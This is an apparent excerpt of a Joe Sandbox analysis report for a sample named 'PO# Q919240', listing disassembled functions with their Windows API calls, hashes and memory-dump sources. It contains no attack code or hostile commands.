                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                • String ID:
                • API String ID: 2710830443-0
                • Opcode ID: 1738b650cb43453f600e53b83a6833ccb1a076b1e6f33d9371cddf7c9876f8ab
                • Instruction ID: 8dfc3faa83ebd232c18032ab1719f084f6ac8c8028b438e2b3a9de4cfe148046
                • Opcode Fuzzy Hash: 1738b650cb43453f600e53b83a6833ccb1a076b1e6f33d9371cddf7c9876f8ab
                • Instruction Fuzzy Hash: 61F06D7168470477EB209BA09D0EFDF379CAB18B11F10C41ABB04BA0C0C6F8B50087AD
                Function 00436C2B Relevance: 6.0, APIs: 4, Instructions: 29synchronizationCOMMON
                Download Yara Rule
                APIs
                • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00436C38
                • UnloadUserProfile.USERENV(?,?,?,000000FF), ref: 00436C46
                • CloseHandle.KERNEL32(?,?,000000FF), ref: 00436C56
                • CloseHandle.KERNEL32(?,?,000000FF), ref: 00436C5B
                  • Part of subcall function 00436BA9: GetProcessHeap.KERNEL32(00000000,?), ref: 00436BB6
                  • Part of subcall function 00436BA9: HeapFree.KERNEL32(00000000), ref: 00436BBD
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                • String ID:
                • API String ID: 146765662-0
                • Opcode ID: b977b2fe1054b7dcb1d3ac6099765c2a2cefd6419b68de81ef4d64d3a5db7b42
                • Instruction ID: 8fc8aea04bb3fa9100768a89291620bc24087d812574934f99790ad9b639e1d9
                • Opcode Fuzzy Hash: b977b2fe1054b7dcb1d3ac6099765c2a2cefd6419b68de81ef4d64d3a5db7b42
                • Instruction Fuzzy Hash: D9E0C97A510215ABC720EBA6DC48C5BB7ACEF99330311892EFD9683750DA74F840CFA4
                Function 00472B63 Relevance: 6.0, APIs: 4, Instructions: 27COMMON
                Download Yara Rule
                APIs
                • GetDesktopWindow.USER32 ref: 00472B63
                • GetDC.USER32(00000000), ref: 00472B6C
                • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00472B78
                • ReleaseDC.USER32(00000000,?), ref: 00472B99
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: CapsDesktopDeviceReleaseWindow
                • String ID:
                • API String ID: 2889604237-0
                • Opcode ID: 25b4e9c05087b9933bd86976477b7eaa0c4512bf79646aedece74daf711fda7f
                • Instruction ID: 759e45c534ddacfdadb557a06d932f9b55f62470d77a370046d272fbe6975a9a
                • Opcode Fuzzy Hash: 25b4e9c05087b9933bd86976477b7eaa0c4512bf79646aedece74daf711fda7f
                • Instruction Fuzzy Hash: BFF03071900205AFDB00EFB5DA4DA5DB7F4FB44315B10887EFD05D7251EAB59900DB54
                Function 00472BB2 Relevance: 6.0, APIs: 4, Instructions: 27COMMON
                Download Yara Rule
                APIs
                • GetDesktopWindow.USER32 ref: 00472BB2
                • GetDC.USER32(00000000), ref: 00472BBB
                • GetDeviceCaps.GDI32(00000000,00000074), ref: 00472BC7
                • ReleaseDC.USER32(00000000,?), ref: 00472BE8
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: CapsDesktopDeviceReleaseWindow
                • String ID:
                • API String ID: 2889604237-0
                • Opcode ID: cc3434de2b8b5abc20458b04240aea2a6e15dc869db4e5eb232345cc1bf11604
                • Instruction ID: 439663e17c05eb9dd95bc161916493026628bcc8c78d0f5787bb5213a8e6c1b3
                • Opcode Fuzzy Hash: cc3434de2b8b5abc20458b04240aea2a6e15dc869db4e5eb232345cc1bf11604
                • Instruction Fuzzy Hash: FAF03075900205AFCB00EFB5DA8856DB7F4FB84315B10887EFD05D7250DB7999019B94
                Function 0041514D Relevance: 6.0, APIs: 4, Instructions: 16threadCOMMON
                Download Yara Rule
                APIs
                • __getptd_noexit.LIBCMT ref: 00415150
                  • Part of subcall function 004179F0: GetLastError.KERNEL32(?,?,00417F7C,00413644,?,?,004115F6,?,00401BAC,?,?,?), ref: 004179F4
                  • Part of subcall function 004179F0: ___set_flsgetvalue.LIBCMT ref: 00417A02
                  • Part of subcall function 004179F0: __calloc_crt.LIBCMT ref: 00417A16
                  • Part of subcall function 004179F0: GetCurrentThreadId.KERNEL32 ref: 00417A46
                  • Part of subcall function 004179F0: SetLastError.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 00417A5E
                • CloseHandle.KERNEL32(?,?,0041519B), ref: 00415164
                • __freeptd.LIBCMT ref: 0041516B
                • ExitThread.KERNEL32 ref: 00415173
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: ErrorLastThread$CloseCurrentExitHandle___set_flsgetvalue__calloc_crt__freeptd__getptd_noexit
                • String ID:
                • API String ID: 1454798553-0
                • Opcode ID: 061228abfcaf70d0abda61f2bc5ea784a59968e7eaac298a3a03e2daddecc56e
                • Instruction ID: f82a1693998e09e6351869d5e4a2ded823041337c12103c56f11d560ed0c89ab
                • Opcode Fuzzy Hash: 061228abfcaf70d0abda61f2bc5ea784a59968e7eaac298a3a03e2daddecc56e
                • Instruction Fuzzy Hash: BCD0A732805E10A7C122273D5C0DBDF26655F40735B140B09FC25872D1CBACDDC143AC
                Function 0042F373 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 370COMMON
                Download Yara Rule
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: _strncmp
                • String ID: Q\E
                • API String ID: 909875538-2189900498
                • Opcode ID: 065ac9b34865f8fc92d580161c5db786cff1d7033ea8ce1a4bef46ec8c054806
                • Instruction ID: ec78d02982e52cebfc3c5ce94050df53d12509a5c8006a296af1ac46f88178f7
                • Opcode Fuzzy Hash: 065ac9b34865f8fc92d580161c5db786cff1d7033ea8ce1a4bef46ec8c054806
                • Instruction Fuzzy Hash: 34C1A070A04279ABDF318E58A4507ABBBB5AF59310FE441BFD8D493341D2784D8ACB89
                Function 00460D41 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 277comCOMMON
                Download Yara Rule
                APIs
                • OleSetContainedObject.OLE32(00000000,00000001), ref: 00460F3E
                  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                  • Part of subcall function 00445660: OleSetContainedObject.OLE32(?,00000000), ref: 004456DD
                  • Part of subcall function 00451B42: GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
                  • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451BF8
                  • Part of subcall function 00451B42: VariantCopy.OLEAUT32(-00000068,?), ref: 00451C0E
                  • Part of subcall function 00451B42: VariantCopy.OLEAUT32(-00000088,?), ref: 00451C27
                  • Part of subcall function 00451B42: VariantClear.OLEAUT32(-00000058), ref: 00451CA1
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: Variant$Copy$ContainedObject$ClearErrorLast_malloc
                • String ID: AutoIt3GUI$Container
                • API String ID: 2652923123-3941886329
                • Opcode ID: 662e4c56437cfc6d97a34dfd7b47562ea5a254ee8eeedf1ae9933f7f1d1523bc
                • Instruction ID: 68a0a4eee7c61d0b7a6187be62517e39d581686f9474de6139c94a20f06104f0
                • Opcode Fuzzy Hash: 662e4c56437cfc6d97a34dfd7b47562ea5a254ee8eeedf1ae9933f7f1d1523bc
                • Instruction Fuzzy Hash: 68A15D746006059FDB10DF69C881B6BB7E4FF88704F24896AEA09CB351EB75E841CB65
                Function 0044F3F4 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 185COMMON
                Download Yara Rule
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: _memmove_strncmp
                • String ID: U$\
                • API String ID: 2666721431-100911408
                • Opcode ID: a4fdddafd13fd2658ce45903ac35fff56edfd8920f85f030d52c4513684e2ed7
                • Instruction ID: d3eef72359a6f1828d14317ef8b56b8bfbdd52bf5bc7584d89ae5f72f5b530e1
                • Opcode Fuzzy Hash: a4fdddafd13fd2658ce45903ac35fff56edfd8920f85f030d52c4513684e2ed7
                • Instruction Fuzzy Hash: 13718F70E00245CFEF24CFA9C9906AEFBF2AF99304F24826ED445A7345D778A946CB15
                Function 00467215 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 181shareCOMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                  • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                • __wcsnicmp.LIBCMT ref: 00467288
                • WNetUseConnectionW.MPR(00000000,?,00000000,?,00000000,?,00000000,?), ref: 0046732E
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: Connection__wcsnicmp_wcscpy_wcslen
                • String ID: LPT
                • API String ID: 3035604524-1350329615
                • Opcode ID: df00d6e4b866e053a8717e7cd00b83b505630e9b2d4c108cf88e8e3b58e1c49d
                • Instruction ID: cd88b7ab87c5f5a0ce5478f82160e7cdfa8c7cefd9f65e810a8a3337a25aa570
                • Opcode Fuzzy Hash: df00d6e4b866e053a8717e7cd00b83b505630e9b2d4c108cf88e8e3b58e1c49d
                • Instruction Fuzzy Hash: FB51E675A04204ABDB10DF54CC81FAFB7B5AB84708F10855EF905AB381E778EE85CB99
                Function 0044F082 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 161COMMON
                Download Yara Rule
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: _memmove
                • String ID: \$h
                • API String ID: 4104443479-677774858
                • Opcode ID: a8076df7cf2e4be12816d18a067c44a6d5606508540493043604d0ea2b9ab827
                • Instruction ID: de34c7bb2fe7d28e42aef252d9636822906cf09101983ade98a7172327fa6e04
                • Opcode Fuzzy Hash: a8076df7cf2e4be12816d18a067c44a6d5606508540493043604d0ea2b9ab827
                • Instruction Fuzzy Hash: F551A370E002098FDF18CFA9C980AAEB7F2BFC9304F28826AD405AB345D7389D45CB55
                Function 0043999F Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144COMMON
                Download Yara Rule
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: _memcmp
                • String ID: &
                • API String ID: 2931989736-1010288
                • Opcode ID: a81d5415846f9cf6a42c700ef8b5aeadd08d018be41d214ef7d3fe054b701e0f
                • Instruction ID: 5cd53615f07abd051f481cac668b43ae4088e938354b3ed51608dfeeaf990cc9
                • Opcode Fuzzy Hash: a81d5415846f9cf6a42c700ef8b5aeadd08d018be41d214ef7d3fe054b701e0f
                • Instruction Fuzzy Hash: EC517BB1A0011A9FDB18CF95D891ABFB7B5FF88300F14915AE815A7344D278AE42CBA4
                Function 0044D3D5 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 141COMMON
                Download Yara Rule
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: _memmove
                • String ID: \
                • API String ID: 4104443479-2967466578
                • Opcode ID: 59d63d8f709c00c8b633315d640480ed85dcad38184220530ca382b626518ab4
                • Instruction ID: e0e732097d18f8f10327b86eac3a97b4532b2e4be511d275227a7a0ca48fbcca
                • Opcode Fuzzy Hash: 59d63d8f709c00c8b633315d640480ed85dcad38184220530ca382b626518ab4
                • Instruction Fuzzy Hash: 2451C570E002498FEF24CFA9C8902AEFBB2BF95314F28826BD45597385D7395D86CB45
                Function 004667E1 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 114networkCOMMON
                Download Yara Rule
                APIs
                • _wcslen.LIBCMT ref: 00466825
                • InternetCrackUrlW.WININET(?,00000000,?), ref: 0046682F
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: CrackInternet_wcslen
                • String ID: |
                • API String ID: 596671847-2343686810
                • Opcode ID: 629f28f3e202f2691df4b53306abf03f6cbb1f7e83fd6186c7c4399916927608
                • Instruction ID: c4ea99685e293915e64884ba1c360efc28696701351dc191072b09a6dd262d67
                • Opcode Fuzzy Hash: 629f28f3e202f2691df4b53306abf03f6cbb1f7e83fd6186c7c4399916927608
                • Instruction Fuzzy Hash: B1415076E10209ABDB00EFA5D881BEEB7B8FF58314F00002AE604A7291D7757916CBE5
                Function 0044835A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 99windowCOMMON
                Download Yara Rule
                APIs
                • SendMessageW.USER32(?,00001132,00000000,?), ref: 00448446
                • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0044845F
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: MessageSend
                • String ID: '
                • API String ID: 3850602802-1997036262
                • Opcode ID: 21874a52306f08f821648492a7afc6200e27140433d35547b734f0a4523aa872
                • Instruction ID: ddf1801fc3b7a37e921bcadc6f33ff454999d78e89978ed9e0859c1643e2593c
                • Opcode Fuzzy Hash: 21874a52306f08f821648492a7afc6200e27140433d35547b734f0a4523aa872
                • Instruction Fuzzy Hash: 46418E71A002099FDB04CF98D880AEEB7B5FF59300F14816EED04AB341DB756952CFA5
                Function 0040F850 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 89COMMON
                Download Yara Rule
                APIs
                • _strlen.LIBCMT ref: 0040F858
                  • Part of subcall function 0040F880: _memmove.LIBCMT ref: 0040F8C9
                  • Part of subcall function 0040F880: _memmove.LIBCMT ref: 0040F8E3
                • _sprintf.LIBCMT ref: 0040F9AE
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: _memmove$_sprintf_strlen
                • String ID: %02X
                • API String ID: 1921645428-436463671
                • Opcode ID: 767cb60b44986bc828a60f9d0ec6f7d4d26665b5612a1b4657e1e4afb2f114d1
                • Instruction ID: e5a937a20bc973e7022889ba35624413ac66f4a4f80aeb0e2d5e31f1d02bff57
                • Opcode Fuzzy Hash: 767cb60b44986bc828a60f9d0ec6f7d4d26665b5612a1b4657e1e4afb2f114d1
                • Instruction Fuzzy Hash: 3E21287270021436D724B66E8C82FDAB39CAF55744F50007FF501A76C1EABCBA1983AD
                Function 00451006 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 75windowCOMMON
                Download Yara Rule
                APIs
                • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0045109A
                • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004510A8
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: MessageSend
                • String ID: Combobox
                • API String ID: 3850602802-2096851135
                • Opcode ID: 1b8a1482498e59a9e674e96fd5fabaeacd2ddbb1f8abcd0cc85bd7074ae773d5
                • Instruction ID: 528d1b292af097fd122ed4be4541c74d7578eb88e117dd2fe935d7ad7cd5862b
                • Opcode Fuzzy Hash: 1b8a1482498e59a9e674e96fd5fabaeacd2ddbb1f8abcd0cc85bd7074ae773d5
                • Instruction Fuzzy Hash: 0A21A5716102096BEB10DE68DC85FDB3398EB59734F20431AFA24A72D1D3B9EC958768
                Function 00451321 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 73windowCOMMON
                Download Yara Rule
                APIs
                • GetWindowTextLengthW.USER32(00000000), ref: 0045134A
                • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0045135A
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
